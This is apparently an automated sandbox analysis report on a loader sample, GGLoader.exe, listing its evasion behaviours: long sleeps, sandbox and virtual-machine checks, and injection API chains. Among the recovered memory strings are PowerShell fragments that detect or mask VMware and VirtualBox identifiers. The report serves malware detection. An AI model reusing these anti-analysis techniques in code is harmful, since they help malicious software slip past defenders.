Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 42_2_00000001400010C0
Found stalling execution ending in API Sleep call
Source: C:\Windows\System32\dllhost.exe Stalling execution: Execution stalls by calling Sleep
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: GGLoader.exe Binary or memory string: SBIEDLL.DLL
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\GGLoader.exe Memory allocated: 1810000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Memory allocated: 1B4D0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\GGLoader.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5689 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4077 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3399 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3192 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6279 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3473 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7014
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2652
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Window / User API: threadDelayed 1055
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4348
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 815
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5850
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1481
Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 881
Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 574
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 4509
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 5490
Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 8996
Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 946
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 4355
Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9875
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\LicenseGet.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\poduiwcd.tmp Jump to dropped file
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\conhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dialer.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\winlogon.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Found evasive API chain checking for process token information
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Windows\System32\conhost.exe API coverage: 6.0 %
Source: C:\Windows\System32\conhost.exe API coverage: 6.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\GGLoader.exe TID: 7484 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776 Thread sleep count: 3399 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760 Thread sleep count: 3192 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804 Thread sleep time: -11068046444225724s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148 Thread sleep count: 6279 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148 Thread sleep count: 3473 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184 Thread sleep time: -11068046444225724s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe TID: 7912 Thread sleep count: 1055 > 30
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe TID: 7912 Thread sleep time: -52750s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6032 Thread sleep count: 4348 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2648 Thread sleep count: 815 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8160 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3736 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6308 Thread sleep count: 5850 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6736 Thread sleep count: 1481 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 8148 Thread sleep count: 881 > 30
Source: C:\Windows\System32\dllhost.exe TID: 8148 Thread sleep time: -88100s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 8184 Thread sleep count: 574 > 30
Source: C:\Windows\System32\dllhost.exe TID: 8184 Thread sleep time: -57400s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 8 Thread sleep count: 4509 > 30
Source: C:\Windows\System32\winlogon.exe TID: 8 Thread sleep time: -4509000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 8 Thread sleep count: 5490 > 30
Source: C:\Windows\System32\winlogon.exe TID: 8 Thread sleep time: -5490000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 5016 Thread sleep count: 8996 > 30
Source: C:\Windows\System32\lsass.exe TID: 5016 Thread sleep time: -8996000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 5016 Thread sleep count: 946 > 30
Source: C:\Windows\System32\lsass.exe TID: 5016 Thread sleep time: -946000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8080 Thread sleep count: 4355 > 30
Source: C:\Windows\System32\svchost.exe TID: 8080 Thread sleep time: -4355000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 5052 Thread sleep count: 9875 > 30
Source: C:\Windows\System32\dwm.exe TID: 5052 Thread sleep time: -9875000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7476 Thread sleep count: 146 > 30
Source: C:\Windows\System32\svchost.exe TID: 7476 Thread sleep time: -146000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7540 Thread sleep count: 141 > 30
Source: C:\Windows\System32\svchost.exe TID: 7540 Thread sleep time: -141000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7512 Thread sleep count: 141 > 30
Source: C:\Windows\System32\svchost.exe TID: 7512 Thread sleep time: -141000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7532 Thread sleep count: 135 > 30
Source: C:\Windows\System32\svchost.exe TID: 7532 Thread sleep time: -135000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7484 Thread sleep count: 63 > 30
Source: C:\Windows\System32\svchost.exe TID: 7484 Thread sleep time: -63000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7496 Thread sleep count: 116 > 30
Source: C:\Windows\System32\svchost.exe TID: 7496 Thread sleep time: -116000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7640 Thread sleep count: 90 > 30
Source: C:\Windows\System32\svchost.exe TID: 7640 Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1216 Thread sleep count: 80 > 30
Source: C:\Windows\System32\svchost.exe TID: 1216 Thread sleep time: -80000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2892 Thread sleep count: 84 > 30
Source: C:\Windows\System32\svchost.exe TID: 2892 Thread sleep time: -84000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5080 Thread sleep count: 84 > 30
Source: C:\Windows\System32\svchost.exe TID: 5080 Thread sleep time: -84000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7696 Thread sleep count: 81 > 30
Source: C:\Windows\System32\svchost.exe TID: 7696 Thread sleep time: -81000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe File opened: PhysicalDrive0 Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\Desktop\GGLoader.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\powercfg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00C0A1F1 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 35_2_00C0A1F1
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E59BE3C FindFirstFileExW, 39_2_000002505E59BE3C
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1BBE3C FindFirstFileExW, 41_2_000001C08C1BBE3C
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_000002131118BE3C FindFirstFileExW, 42_2_000002131118BE3C
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC64BE3C FindFirstFileExW, 43_2_00000225DC64BE3C
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00793B60 GetSystemInfo,GlobalMemoryStatusEx,CreateFileA,DeviceIoControl,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 6_2_00793B60
Source: C:\Users\user\Desktop\GGLoader.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000001.00000002.1967211454.000001EC48F35000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAE'
Source: svcupdater.exe, 00000023.00000002.2994296261.000000000116A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW{
Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: svchost.exe, 00000033.00000002.2990825628.000001845BC0A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svcupdater.exe, 00000023.00000002.2994296261.000000000113B000.00000004.00000020.00020000.00000000.sdmp, svcupdater.exe, 00000023.00000002.2994296261.000000000116A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.1767788945.000002511E4B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAdd-Type-AssemblyNameSystem.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('NoVirtualMachine/Serverisallowed!Tryrunningonadifferentdevice!','','OK','Error')<#wkk#>;j
Source: GGLoader.exe, 00000000.00000002.1714327459.000000000152B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: svchost.exe, 00000035.00000003.2350422690.000001D559C7F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000035.00000003.2355871811.000001D559386000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: GGLoader.exe Binary or memory string: CheckForVMwareAndVirtualBox
Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 0000002D.00000002.2957315131.000002A66062A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 00000035.00000002.3000604673.000001D559E88000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMCI: Using capabilities (0x1c).
Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: GGLoader.exe Binary or memory string: vmware
Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: powershell.exe, 00000003.00000002.1767742399.000002511CE80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAdd-Type-AssemblyNameSystem.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('NoVirtualMachine/Serverisallowed!Tryrunningonadifferentdevice!','','OK','Error')<#wkk#>;W6432=C:\Progr@L]
Source: svchost.exe, 00000035.00000002.2964974668.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000000.2294791024.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: powershell.exe, 00000003.00000002.1767408817.000002511CAF2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1767408817.000002511CAE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1790991366.0000025136E12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1789784483.0000025136BB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAdd-Type-AssemblyNameSystem.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('NoVirtualMachine/Serverisallowed!Tryrunningonadifferentdevice!','','OK','Error')<#wkk#>;
Source: svchost.exe, 00000035.00000003.2355871811.000001D559386000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 00000035.00000000.2296597019.000001D5592C3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: dowvmci
Source: svchost.exe, 00000035.00000000.2296026118.000001D559020000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware
Source: svchost.exe, 00000035.00000003.2349769567.000001D5599A5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: GGLoader.exe, 00000000.00000002.1714327459.000000000152B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}2igv
Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: GGLoader.exe Binary or memory string: Form200Form210Form220Form230Form240Form250Form260Form270Form280Form290Form201Form211Form221Form231Form241Form251Form261Form271Form281Form291D1Form202Form212Form222Form232Form242Form252Form262Form272Form282Form292Form203Form213Form223Form233Form243Form253Form263Form273Form283Form293Form204Form214Form224Form234Form244Form254Form264Form274Form284Form294Form205Form215Form225Form235Form245Form255Form265Form275Form285Form295Form206Form216Form226Form236Form246Form256Form266Form276Form286Form296Form207Form217Form227Form237Form247Form257Form267Form277Form287Form297Form208Form218Form228Form238Form248Form258Form268Form278Form288Form298get_UTF8Form209Form219Form229Form239Form249Form259Form269Form279Form289Form299<Module>mscorlibThreadget_IsAttachedIsEmulatedNetGuardIDisposableget_HandleGetModuleHandleCloseHandleset_WindowStyleProcessWindowStyleset_FileNameDisposeBabelAttributeSuppressIldasmAttributeYanoAttributeDotfuscatorAttributeCompilationRelaxationsAttributeConfusedByAttributeRuntimeCompatibilityAttributeD1.exeSystem.ThreadingEncodingFromBase64StringToStringGetStringObfuscatedByGoliathAntiVMCheckAntiDebugCheckkernel32.dllget_ItemSystemMainManagementObjectCollectionExceptionProcessStartInfoZeroSleepDebuggerManagementObjectSearcherToLowerManagementObjectEnumeratorGetEnumerator.ctor.cctordotNetProtectorIntPtrSystem.DiagnosticsSystem.Runtime.CompilerServicesContainsGetCurrentProcessset_ArgumentsManagementBaseObjectGetop_ExplicitExitToUpperInvariantSystem.ManagementEnvironmentget_CurrentIsModulePresentCheckRemoteDebuggerPresentIsDebuggerPresentget_TickCountStartConvertMoveNextSystem.Textset_CreateNoWindowCheckForVMwareAndVirtualBoxdmjzxop_Equalityop_InequalityESelect * from Win32_ComputerSystem
Source: svchost.exe, 00000035.00000000.2297078138.000001D559386000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: dwm.exe, 0000002E.00000000.2237368637.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: GGLoader.exe, 00000000.00000002.1714729669.00000000034D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware@E
Source: svchost.exe, 00000035.00000000.2297078138.000001D5593A4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: storahciNECVMWarVMware SATA CD00
